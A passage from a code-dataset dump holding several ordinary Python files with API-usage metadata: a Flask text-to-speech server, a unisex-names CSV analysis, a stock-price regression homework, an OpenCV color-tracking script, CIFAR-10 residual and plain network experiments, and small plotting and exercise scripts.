5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "models.shufflenet.ShuffleNetG2", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "413652706", "text": "#!/usr/bin/env python3\nimport io\nimport os\nimport time\nfrom pathlib import Path\n\nimport torch\nfrom flask import Flask, Response, render_template, request\nfrom flask_cors import CORS\nfrom TTS.tf.utils.tflite import load_tflite_model\nfrom TTS.tf.utils.io import load_checkpoint\nfrom TTS.utils.io import load_config\nfrom TTS.utils.text.symbols import symbols, phonemes\nfrom TTS.utils.audio import AudioProcessor\nfrom TTS.utils.synthesis import synthesis\n\n_DIR = Path(__file__).parent\n\n# -----------------------------------------------------------------------------\n\n\ndef run_vocoder(mel_spec):\n vocoder_inputs = mel_spec[None, :, :]\n # get input and output details\n input_details = vocoder_model.get_input_details()\n # reshape input tensor for the new input shape\n vocoder_model.resize_tensor_input(input_details[0]['index'], vocoder_inputs.shape)\n vocoder_model.allocate_tensors()\n detail = input_details[0]\n vocoder_model.set_tensor(detail['index'], vocoder_inputs)\n # run the model\n vocoder_model.invoke()\n # collect outputs\n output_details = vocoder_model.get_output_details()\n waveform = vocoder_model.get_tensor(output_details[0]['index'])\n return waveform \n\n\ndef tts(model, text, CONFIG, p):\n t_1 = time.time()\n waveform, alignment, mel_spec, mel_postnet_spec, stop_tokens, inputs = synthesis(model, text, CONFIG, use_cuda, ap, speaker_id, style_wav=None,\n truncated=False, enable_eos_bos_chars=CONFIG.enable_eos_bos_chars,\n backend='tflite')\n waveform = run_vocoder(mel_postnet_spec.T)\n waveform = waveform[0, 0]\n rtf = (time.time() - t_1) / (len(waveform) / ap.sample_rate)\n tps = (time.time() - t_1) / len(waveform)\n print(waveform.shape)\n print(\" > Run-time: {}\".format(time.time() - t_1))\n print(\" > Real-time factor: {}\".format(rtf))\n print(\" > Time per step: {}\".format(tps))\n return alignment, mel_postnet_spec, stop_tokens, waveform\n\n\n# -----------------------------------------------------------------------------\n\n# runtime settings\nuse_cuda = False\n\n# model paths\nTTS_MODEL = str(_DIR / \"model\" / \"tts_model.tflite\")\nTTS_CONFIG = str(_DIR / \"model\" / \"config.json\")\nVOCODER_MODEL = str(_DIR / \"vocoder\" / \"vocoder_model.tflite\")\nVOCODER_CONFIG = str(_DIR / \"vocoder\" / \"config_vocoder.json\")\n\n# load configs\nTTS_CONFIG = load_config(TTS_CONFIG)\nVOCODER_CONFIG = load_config(VOCODER_CONFIG)\n\n# load the audio processor\nap = AudioProcessor(**TTS_CONFIG.audio)\n\n# LOAD TTS MODEL\n# multi speaker\nspeaker_id = None\nspeakers = []\n\n# load the model\nmodel = load_tflite_model(TTS_MODEL)\nvocoder_model = load_tflite_model(VOCODER_MODEL)\n\n# -----------------------------------------------------------------------------\n\napp = Flask(\"mozillatts\")\nCORS(app)\n\n# -----------------------------------------------------------------------------\n\n\n@app.route(\"/api/tts\")\ndef api_tts():\n text = request.args.get(\"text\", \"\").strip()\n align, spec, stop_tokens, wav = tts(model, text, TTS_CONFIG, ap)\n\n with io.BytesIO() as out:\n ap.save_wav(wav, out)\n return Response(out.getvalue(), mimetype=\"audio/wav\")\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n# -----------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5002)\n", "sub_path": "tts.py", "file_name": "tts.py", "file_ext": "py", "file_size_in_byte": 3443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "TTS.utils.synthesis.synthesis", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "TTS.utils.io.load_config", "line_number": 67, "usage_type": "call"}, {"api_name": "TTS.utils.io.load_config", "line_number": 68, "usage_type": "call"}, {"api_name": "TTS.utils.audio.AudioProcessor", "line_number": 71, "usage_type": "call"}, {"api_name": "TTS.tf.utils.tflite.load_tflite_model", "line_number": 79, "usage_type": "call"}, {"api_name": "TTS.tf.utils.tflite.load_tflite_model", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 84, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "251284305", "text": "import os\nimport csv\nimport collections\nfrom typing import List\n\ndata = []\n\nRecord = collections.namedtuple('Record', 'uid,name,total,'\n 'male_share,female_share,gap')\n\n\ndef init():\n base_folder = os.path.dirname(__file__)\n filename = os.path.join(base_folder, 'data', 'unisex_names_table.csv')\n\n with open(filename, 'r', encoding='utf-8') as fin:\n reader = csv.DictReader(fin)\n\n data.clear()\n for row in reader:\n record = parse_row(row)\n data.append(record)\n\n\ndef parse_row(row):\n row[''] = int(row[''])\n row['total'] = float(row['total'])\n row['male_share'] = float(row['male_share'])\n row['female_share'] = float(row['female_share'])\n row['gap'] = float(row['gap'])\n\n record = Record(row[''], row['name'], row['total'], row['male_share'],\n row['female_share'], row['gap'])\n\n return record\n\n\ndef most_male_name() -> List[Record]:\n return sorted(data, key=lambda r: -r.male_share)\n\n\ndef most_female_name() -> List[Record]:\n return sorted(data, key=lambda r: -r.female_share)\n\n\ndef most_unisex_name() -> List[Record]:\n return sorted(data, key=lambda r: r.gap)\n\n\nif __name__ == '__main__':\n print('Unisex Names')\n init()\n print('The 5 most male unisex names')\n names = most_male_name()\n for idx, d in enumerate(names[:5]):\n print(f'{idx+1} {d.name} with {d.male_share} % Male')\n print('The 5 most female unisex names')\n names = most_female_name()\n for idx, d in enumerate(names[:5]):\n print(f'{idx+1} {d.name} with {d.female_share} % Female')\n print('The 5 most unisex names')\n names = most_unisex_name()\n for idx, d in enumerate(names[:5]):\n print(f'{idx+1} {d.name} with {d.gap} % difference between male '\n f'and female usage')", "sub_path": "days/37-39-csv-data-analsys/unisex_names/research.py", "file_name": "research.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.namedtuple", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "12082108", "text": "# import lots of things\nimport pandas as pd\nimport pandas_datareader.data as web\nfrom pandas import Series, DataFrame\nimport datetime\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.linear_model import Ridge\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn import preprocessing\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib import style\n\nimport math\nimport numpy as np\n\nstart = datetime.datetime(2015, 1, 1)\nend = datetime.datetime(2019, 9, 7)\n\ndataset = web.DataReader(\"NFLX\", 'yahoo', start, end)\n\ndatasetfreg = dataset.loc[:, ['Adj Close', 'Volume']]\ndatasetfreg['HL_PCT'] = (dataset['High'] - dataset['Low']\n ) / dataset['Close'] * 100.0\ndatasetfreg['PCT_change'] = (\n dataset['Close'] - dataset['Open']) / dataset['Open'] * 100.0\n\n# Drop missing value\ndatasetfreg.fillna(value=-99999, inplace=True)\n\n# We want to separate 1 percent of the data to forecast\nforecast_out = int(math.ceil(0.02 * len(datasetfreg)))\n\n# Separating the label here, we want to predict the AdjClose\nforecast_col = 'Adj Close'\ndatasetfreg['label'] = datasetfreg[forecast_col].shift(-forecast_out)\nX = np.array(datasetfreg.drop(['label'], 1))\n\n\n# Scale the X so that everyone can have the same distribution for linear regression\nX = preprocessing.scale(X)\n\n# Finally We want to find Data Series of late X and early X (train) for model generation and evaluation\nX_lately = X[-forecast_out:]\nX = X[:-forecast_out]\n\n# Separate label and identify it as y\ny = np.array(datasetfreg['label'])\ny = y[:-forecast_out]\n\nprint(datasetfreg.shape)\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.35, random_state=0)\n\n# Linear regression\nclfreg = LinearRegression(n_jobs=-1)\nclfreg.fit(X_train, y_train)\n\n# Quadratic Regression 2\nclfpoly2 = make_pipeline(PolynomialFeatures(2), Ridge())\nclfpoly2.fit(X_train, y_train)\n\n# Quadratic Regression 3\nclfpoly3 = make_pipeline(PolynomialFeatures(3), Ridge())\nclfpoly3.fit(X_train, y_train)\n\n# KNN Regression\nclfknn = KNeighborsRegressor(n_neighbors=2)\nclfknn.fit(X_train, y_train)\n\nconfidencereg = clfreg.score(X_test, y_test)\nconfidencepoly2 = clfpoly2.score(X_test, y_test)\nconfidencepoly3 = clfpoly3.score(X_test, y_test)\nconfidenceknn = clfknn.score(X_test, y_test)\n\nprint('The linear regression confidence is ', confidencereg)\nprint('The quadratic regression 2 confidence is', confidencepoly2)\nprint('The quadratic regression 3 confidence is', confidencepoly3)\nprint('The knn regression confidence is', confidenceknn)\n\nforecast_set = clfpoly2.predict(X_lately)\nregression_set = clfpoly2.predict(X)\ndatasetfreg['Forecast'] = np.nan\n\n\nmpl.rc('figure', figsize=(20, 10))\nmpl.__version__\n\nlast_date = datasetfreg.iloc[-1].name\nlast_unix = last_date\nnext_unix = last_unix + datetime.timedelta(days=1)\n\n\nfor i in forecast_set:\n next_date = next_unix\n next_unix += datetime.timedelta(days=1)\n datasetfreg.loc[next_date] = [\n np.nan for _ in range(len(datasetfreg.columns)-1)]+[i]\n\nplt.plot(datasetfreg['Adj Close'].tail(400))\nplt.plot(datasetfreg['Forecast'].tail(400))\n\n\nplt.legend(loc=4)\nplt.xlabel('Date')\nplt.ylabel('Price')\nplt.show()\n", "sub_path": "homework.py", "file_name": "homework.py", "file_ext": "py", "file_size_in_byte": 3474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas_datareader.data.DataReader", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 28, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsRegressor", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 92, "usage_type": "attribute"}, {"api_name": "matplotlib.rc", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.__version__", "line_number": 96, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 107, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "388773369", "text": "import matplotlib.pyplot as plt\nimport math\n\nplt.rcParams['font.family'] = \"Arial\"\n\ntime = [7, 9, 11, 12, 14]\naccuracy = [0.491, 0.513, 0.500, 0.479, 0.474]\nprecision = [0.416, 0.443, 0.420, 0.422, 0.404]\nrecall = [ 0.401, 0.433, 0.420, 0.403, 0.399]\nf1 = [0.401, 0.430, 0.413, 0.400, 0.389]\n\na = plt.plot(time, accuracy, color='blue', label='Accuracy')\nb = plt.plot(time, precision, color='black', label='Precision')\nc = plt.plot(time, recall, color='red', label='Recall')\nd = plt.plot(time, f1, color='green', label='F1 score')\n\nplt.legend()\n\nplt.xlabel(\"Training time\", fontsize = 14)\nplt.ylabel(\"Evaluation metrics\", fontsize = 14)\n\nplt.show()\n\n", "sub_path": "obligatory1/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 4, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 4, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "256220938", "text": "import cv2\r\nimport numpy as np\r\n\r\ndef nothing(x):\r\n pass\r\n\r\ncap = cv2.VideoCapture(0);\r\n\r\ncv2.namedWindow(\"Tracking\")\r\ncv2.createTrackbar(\"LH\", \"Tracking\", 0,255,nothing)\r\ncv2.createTrackbar(\"LS\", \"Tracking\", 0,255,nothing)\r\ncv2.createTrackbar(\"LV\", \"Tracking\", 0,255,nothing)\r\n\r\ncv2.createTrackbar(\"UH\", \"Tracking\", 255,255,nothing)\r\ncv2.createTrackbar(\"US\", \"Tracking\", 255,255,nothing)\r\ncv2.createTrackbar(\"UV\", \"Tracking\", 255,255,nothing)\r\n\r\n\r\n\r\n\r\nwhile True:\r\n frame = cv2.imread('m&m.jpg')\r\n # _, frame = cap.read()\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n l_h = cv2.getTrackbarPos(\"LH\", \"Tracking\")\r\n l_s = cv2.getTrackbarPos(\"LS\", \"Tracking\")\r\n l_v = cv2.getTrackbarPos(\"LV\", \"Tracking\")\r\n\r\n u_h = cv2.getTrackbarPos(\"UH\", \"Tracking\")\r\n u_s = cv2.getTrackbarPos(\"US\", \"Tracking\")\r\n u_v = cv2.getTrackbarPos(\"UV\", \"Tracking\")\r\n\r\n l_b = np.array([l_h,l_s,l_v])\r\n u_b = np.array([u_h,u_s,u_v])\r\n\r\n mask = cv2.inRange(hsv, l_b, u_b)\r\n res = cv2.bitwise_and (frame, frame, mask = mask)\r\n\r\n cv2.imshow(\"frame\", frame)\r\n cv2.imshow(\"mask\", mask)\r\n cv2.imshow(\"res\", res)\r\n\r\n\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncv2.destroyAllWindows()\r\n# cap.release()\r\n\r\n\r\n# img = cv2.imread('lena.jpg',1)\r\n\r\n# cv2.imshow('image',img)\r\n# k = cv2.waitKey(0)\r\n# if k == 27:\r\n# cv2.destroyAllWindows()\r\n# elif k == ord('s'):\r\n# cv2.imwrite('lena_copy.png', img)\r\n\r\n\r\n# img = cv2.imread('lena.jpg',1)\r\n# img = cv2.line(img,(0,0),(500,700),(255,255,0), 1)\r\n# img = cv2.arrowedLine(img,(0,255),(100,100),(255,255,0), 2)\r\n# img = cv2.rectangle(img, (50,0), (100,128), (255,0,0),5)\r\n# cv2.imshow('image', img)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\n\r\n\r\n#flag 1 is color\r\n#flag 0 is greyscale\r\n#flag -1 including alpha channel\r\n\r\n\r\n# this is a video capture\r\n# cap = cv2.VideoCapture(0)\r\n# fourcc = cv2.VideoWriter_fourcc(*'XVID')\r\n# out = cv2.VideoWriter('output.avi', fourcc,20.0,(640,480))\r\n\r\n# while(cap.isOpened()):\r\n# ret, frame = cap.read()\r\n# if ret == True:\r\n# print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n# print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n# out.write(frame)\r\n\r\n# gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n# cv2.imshow('video',gray)\r\n\r\n# if cv2.waitKey(1) & 0xFF == ord('q'):\r\n# break\r\n# else:\r\n# break\r\n\r\n# cap.release()\r\n# out.release()\r\n# cv2.destroyAllWindows()\r\n\r\n\r\n# read image\r\n\r\n", "sub_path": "OpenCVProject/colorDetection.py", "file_name": "colorDetection.py", "file_ext": "py", "file_size_in_byte": 2473, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.getTrackbarPos", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "11569532", "text": "# -*- coding: utf-8 -*-\n\n\"\"\" Deep Residual Network.\nApplying a Deep Residual Network to CIFAR-10 Dataset classification task.\nReferences:\n - K. He, X. Zhang, S. Ren, and J. Sun. Deep Residual Learning for Image\n Recognition, 2015.\n - Learning Multiple Layers of Features from Tiny Images, A. Krizhevsky, 2009.\nLinks:\n - [Deep Residual Network](http://arxiv.org/pdf/1512.03385.pdf)\n - [CIFAR-10 Dataset](https://www.cs.toronto.edu/~kriz/cifar.html)\n\"\"\"\n\nfrom __future__ import division, print_function, absolute_import\n\nimport tflearn\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser(description='ResNet.')\nparser.add_argument('-n', metavar='--nBlocks',nargs=1,type=int,required=True,\n help='Parametro n segun paper. #layers = 2 + (6n)')\nparser.add_argument('-e', metavar='--nBlocks',nargs=1,type=int,required=True,\n help='Cantidad de epochs')\nparser.add_argument('-a', metavar='--act',nargs=4,type=str,required=False,\n help='Configuracion de activaciones')\n\nparser.add_argument('-exp', metavar='--experimento',nargs=2,type=str,required=False,\n help='Id de experimento y funcion de activacion a aplicar')\n\nparser.add_argument('-b', metavar='--block-mode',nargs=1,type=str,required=False,\n help='Id de experimento y funcion de activacion a aplicar')\n\nparser.add_argument('-suf2', metavar='--suffix2',nargs=1,type=str,required=False,\n help='Sufijo 2 al nombre del modelo')\n\nargs = vars(parser.parse_args())\n\n# Residual blocks\n# 20 layers: n=3\n# 32 layers: n=5,\n# 44 layers: n=7,\n# 56 layers: n=9,\n# 110 layers: n=18\nexperimentos = {\n 'default':['relu','relu','relu','relu'],\n 'E1':[None,None,None,None],\n 'E2':[None,None,'relu','relu'],\n 'E3':['relu','relu',None,None],\n 'E4':[None,'relu','relu','relu'],\n 'E5':[None,'relu',None,None],\n 'E6':['relu',None,None,None]\n}\nn = args['n'][0]\nEPOCHS=args['e'][0]\nactivations = args['a']\nexperimento = args['exp']\n\nsuffix2 = args['suf2']\n\n\nif args['b'] == None:\n block_mode = 'reference'\nelse:\n block_mode = args['b'][0]\n\nif block_mode.upper() == 'REFERENCE':\n bn_position = 'before'\n last_actv = True\nelif block_mode.upper() == 'BN_AA':\n bn_position = 'after'\n last_actv = True\nelif block_mode.upper() == 'NO_RELU':\n bn_position = 'before'\n last_actv = False\n\nif experimento != None:\n id_exp = experimento[0]\n activ_fn = experimento[1]\n activations = experimentos[id_exp]\n activations = [activ_fn if v is None else v for v in activations]\n suffix = id_exp+'_'+activ_fn\nelif activations == None:\n activations = experimentos['default']\n suffix = 'default'\nelse:\n suffix = 'acts='+'_'.join(activations)\n\nlayers = (n*6)+2\n\n# Data loading\nfrom tflearn.datasets import cifar10\nfrom modulos import my_plain_block\n\n\n(X, Y), (testX, testY) = cifar10.load_data()\nY = tflearn.data_utils.to_categorical(Y,nb_classes=10)\ntestY = tflearn.data_utils.to_categorical(testY,nb_classes=10)\n\n# Real-time data preprocessing\nimg_prep = tflearn.ImagePreprocessing()\nimg_prep.add_featurewise_zero_center(per_channel=True)\n\n# Real-time data augmentation\nimg_aug = tflearn.ImageAugmentation()\nimg_aug.add_random_flip_leftright()\nimg_aug.add_random_crop([32, 32], padding=4)\n\n# Building Residual Network\nnet = tflearn.input_data(shape=[None, 32, 32, 3],\n data_preprocessing=img_prep,\n data_augmentation=img_aug)\nnet = tflearn.conv_2d(net, 16, 3, regularizer='L2', weight_decay=0.0001)\nnet = tflearn.batch_normalization(net)\nnet = tflearn.activation(net,activation=activations[0])\nnet = my_plain_block(net, n, 16,activation=activations[1],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, 1, 32, downsample=True,activation=activations[2],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, n-1, 32,activation=activations[2],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, 1, 64, downsample=True,activation=activations[3],bn_position=bn_position,last_actv=last_actv)\nnet = my_plain_block(net, n-1, 64,activation=activations[3],bn_position=bn_position,last_actv=last_actv)\nnet = tflearn.global_avg_pool(net)\n# Regression\nnet = tflearn.fully_connected(net, 10, activation='softmax')\nmom = tflearn.Momentum(0.1, lr_decay=0.1, decay_step=32000, staircase=True)\nnet = tflearn.regression(net, optimizer=mom,\n loss='categorical_crossentropy')\n# Training\nmodel = tflearn.DNN(net, checkpoint_path='./checkpoints/', tensorboard_verbose=0,tensorboard_dir='log',\n clip_gradients=0.)\n\n\nmodel_name = 'PLAIN_'+str(layers)+'_layers_'+str(EPOCHS)+'_epochs_BM='+block_mode+'_'+suffix\n\nif suffix2 != None:\n model_name = model_name +'_'+suffix2[0]\n\nmodel.fit(X, Y, n_epoch=EPOCHS, validation_set=(testX, testY),\n snapshot_epoch=True,\n show_metric=True, batch_size=128, shuffle=True,\n run_id='resnet_cifar10_'+model_name)\n\nmodel.save('./models_trained/resnet_cifar10_'+model_name+'_model')", "sub_path": "Experiments_PlainNet.py", "file_name": "Experiments_PlainNet.py", "file_ext": "py", "file_size_in_byte": 5073, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "tflearn.datasets.cifar10.load_data", "line_number": 96, "usage_type": "call"}, {"api_name": "tflearn.datasets.cifar10", "line_number": 96, "usage_type": "name"}, {"api_name": "tflearn.data_utils.to_categorical", "line_number": 97, "usage_type": "call"}, {"api_name": "tflearn.data_utils", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tflearn.data_utils.to_categorical", "line_number": 98, "usage_type": "call"}, {"api_name": "tflearn.data_utils", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tflearn.ImagePreprocessing", "line_number": 101, "usage_type": "call"}, {"api_name": "tflearn.ImageAugmentation", "line_number": 105, "usage_type": "call"}, {"api_name": "tflearn.input_data", "line_number": 110, "usage_type": "call"}, {"api_name": "tflearn.conv_2d", "line_number": 113, "usage_type": "call"}, {"api_name": "tflearn.batch_normalization", "line_number": 114, "usage_type": "call"}, {"api_name": "tflearn.activation", "line_number": 115, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 116, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 117, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 118, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 119, "usage_type": "call"}, {"api_name": "modulos.my_plain_block", "line_number": 120, "usage_type": "call"}, {"api_name": "tflearn.global_avg_pool", "line_number": 121, "usage_type": "call"}, {"api_name": "tflearn.fully_connected", "line_number": 123, "usage_type": "call"}, {"api_name": "tflearn.Momentum", "line_number": 124, "usage_type": "call"}, {"api_name": "tflearn.regression", "line_number": 125, "usage_type": "call"}, {"api_name": "tflearn.DNN", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "264927786", "text": "def lateRide(n):\n import datetime\n \n starttime = datetime.time(0)\n \n curtime = datetime.timedelta(minutes=n) #get the current time\n curtime = str (curtime).split(\":\") #cast the current time as a string, split by hh:mm:ss\n string = ''.join(curtime) #join the items as one string\n return sum([int(digit) for digit in str(string)])\n \n", "sub_path": "Intro Gates/Late Ride.py", "file_name": "Late Ride.py", "file_ext": "py", "file_size_in_byte": 358, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.time", "line_number": 4, "usage_type": "call"}, {"api_name": 